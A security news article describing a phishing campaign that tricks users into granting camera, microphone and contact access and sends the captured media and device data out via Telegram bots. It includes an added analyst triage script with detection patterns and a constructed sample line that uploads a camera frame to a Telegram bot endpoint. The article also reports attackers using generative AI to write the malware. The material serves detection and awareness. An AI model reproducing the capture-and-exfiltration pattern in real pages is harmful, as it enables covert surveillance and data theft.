TheCyberExpress

AI-Driven Phishing Campaign Exploits Browser Access


A new AI-driven phishing campaign, uncovered by Cyble Research & Intelligence Labs (CRIL), demonstrates how attackers are moving beyond traditional credential theft and adopting more invasive, technology-driven tactics. 

According to CRIL, the campaign has been active since early 2026 and relies on a wide range of social engineering lures, including themes like ID scanner, Telegram ID freezing, and “Health Fund AI.” These deceptive entry points are designed to trick users into granting access to hardware features such as cameras and microphones under the guise of verification or account recovery. 

Once permissions are granted, the malicious scripts begin collecting extensive data. This includes images, video recordings, microphone audio, device specifications, contact details, and approximate geographic location. The stolen data is then transmitted to attacker-controlled systems via Telegram bots, making exfiltration quick and efficient. 

Researchers also noted signs of AI-assisted code generation within the campaign’s infrastructure. Structured annotations and unusual emoji-based formatting embedded in the scripts suggest the use of generative AI tools to streamline development and deployment. 

Infrastructure and Attack Mechanism 

The campaign primarily uses the edgeone.app platform to host phishing pages, enabling scalable and low-cost deployment. These pages impersonate well-known platforms such as TikTok, Instagram, Telegram, Google Chrome, and even games like Flappy Bird to gain user trust. 

Campaign Overview (Source: Cyble)

Unlike traditional phishing attacks that rely on victims entering credentials, this AI-driven phishing campaign focuses on browser-level permissions. Once a user interacts with a phishing page, JavaScript code triggers permission prompts. If accepted, the script activates the device camera and begins capturing live data. 

JavaScript Implementation Used for Browser-Based Photo Capture (Source: Cyble)

A key technique involves rendering a frame from a live video stream onto an HTML5 canvas using ctx.drawImage(), then converting it into a JPEG file via canvas.toBlob(). This file is immediately transmitted to attackers through the Telegram Bot API. The same process is used for video and audio recordings. 

Expanded Data Collection Capabilities 

The phishing framework goes beyond simple media capture. It performs extensive device fingerprinting using browser APIs such as: 

  • navigator.userAgent 
  • navigator.platform 
  • navigator.deviceMemory 
  • navigator.hardwareConcurrency 
  • navigator.connection 
  • navigator.getBattery 

Through these methods, attackers gather detailed information about the victim’s device, including operating system, browser version, CPU capacity, RAM, network type, and battery status. 

Additionally, the script retrieves the victim’s IP address via external services and enriches it with geolocation data such as country, city, latitude, and longitude. This information is aggregated and sent to attackers before further data collection begins. 

Script Fetching Victim IP and Geolocation via External APIs (Source: Cyble)

The campaign also attempts to access contact lists using the browser’s Contacts Picker API. If users grant permission, names, phone numbers, and email addresses are extracted and transmitted. 

Role of Telegram in Data Exfiltration 

A notable aspect of this campaign is its reliance on Telegram for command-and-control (C2) operations. By using Telegram bots, attackers eliminate the need for complex backend infrastructure. Data such as images, videos, and audio files are sent directly via API methods like sendPhoto, sendVideo, and sendAudio. 

This approach simplifies operations while providing attackers with immediate access to stolen information. 
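For analysts triaging a suspect page, the combination of behaviours described above (camera capture rendered through a canvas, device fingerprinting, and direct uploads to the Telegram Bot API) is more telling than any single API call, since legitimate video-chat pages also request the camera. The following is an added example, not code from Cyble's report or from the campaign itself; the indicator names, weights, and the two sample scripts are constructed for illustration.

```javascript
// Static triage of a page's JavaScript for the indicator combination the
// article describes. Regexes, ids and weights are my own choices (assumptions).
const INDICATORS = [
  { id: "media-capture",    weight: 3, re: /getUserMedia\s*\(/ },
  { id: "canvas-export",    weight: 2, re: /\.(toBlob|toDataURL)\s*\(/ },
  { id: "telegram-bot-api", weight: 4, re: /api\.telegram\.org\/bot/ },
  { id: "telegram-media",   weight: 3, re: /\b(sendPhoto|sendVideo|sendAudio)\b/ },
  { id: "fingerprinting",   weight: 1, re: /navigator\.(deviceMemory|hardwareConcurrency|connection|getBattery)\b/ },
  { id: "contacts-picker",  weight: 3, re: /navigator\.contacts\.select\s*\(/ },
  { id: "emoji-annotation", weight: 1, re: /[\u{1F300}-\u{1FAFF}]/u },
];

// Capture paired with an exfiltration channel is what separates this campaign
// from an ordinary webcam page, so the verdict keys on that pairing, not the score.
const CAPTURE = new Set(["media-capture", "contacts-picker"]);
const EXFIL = new Set(["telegram-bot-api", "telegram-media"]);

function triageScript(source) {
  const matched = INDICATORS.filter((i) => i.re.test(source));
  const hits = matched.map((i) => i.id);
  const score = matched.reduce((sum, i) => sum + i.weight, 0);
  const capture = hits.some((h) => CAPTURE.has(h));
  const exfil = hits.some((h) => EXFIL.has(h));
  const verdict = capture && exfil ? "high" : score >= 4 ? "medium" : "low";
  return { score, hits, verdict };
}

// Constructed sample mirroring the behaviours reported (placeholder bot token).
const SUSPECT = [
  "// 📸 Step 1: ask for the camera under a 'verification' pretext",
  "const stream = await navigator.mediaDevices.getUserMedia({ video: true });",
  "ctx.drawImage(video, 0, 0); canvas.toBlob(send, 'image/jpeg');",
  "fetch('https://api.telegram.org/bot<TOKEN>/sendPhoto', { method: 'POST', body: form });",
  "const info = { mem: navigator.deviceMemory, cores: navigator.hardwareConcurrency };",
].join("\n");

// Constructed benign sample: a video-call page that uses the camera but never uploads frames.
const BENIGN = [
  "const stream = await navigator.mediaDevices.getUserMedia({ video: true, audio: true });",
  "peerConnection.addTrack(stream.getVideoTracks()[0], stream);",
].join("\n");

console.log(JSON.stringify(triageScript(SUSPECT)));
console.log(JSON.stringify(triageScript(BENIGN)));
```

The benign page scores on the camera request alone and stays "low", while the suspect sample reaches "high" because capture and a Telegram upload appear together.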

User Interface Deception 

To maintain credibility, phishing pages display realistic status messages such as “Capturing photo,” “Sending to server,” and “Photo sent successfully.” These prompts mimic legitimate verification workflows, reinforcing the illusion of authenticity. 

Once the data is captured and transmitted, the script shuts down the camera and resets the interface, leaving minimal visible traces of the attack. 

Risks and Business Impact 

The implications of this AI-driven phishing campaign are significant. By collecting biometric and contextual data, attackers gain powerful tools for: 

  • Identity theft and account takeover 
  • Bypassing video-based verification systems 
  • Targeted social engineering attacks 
  • Extortion using captured multimedia 

For example, images and audio recordings could be used to impersonate victims or bypass KYC (Know Your Customer) systems. Device and location data allow attackers to craft highly personalized attacks, increasing their success rate. 

Organizations face additional risks, including reputational damage, regulatory exposure, and financial losses. The use of impersonated brands further amplifies the threat by eroding trust in legitimate digital services. 

One of the more unusual findings in this campaign is the presence of emojis embedded within the script’s operational logic. While uncommon in manually written malware, such patterns are linked to AI-assisted code generation. This suggests attackers may be leveraging generative AI tools to accelerate development and scale their operations. 
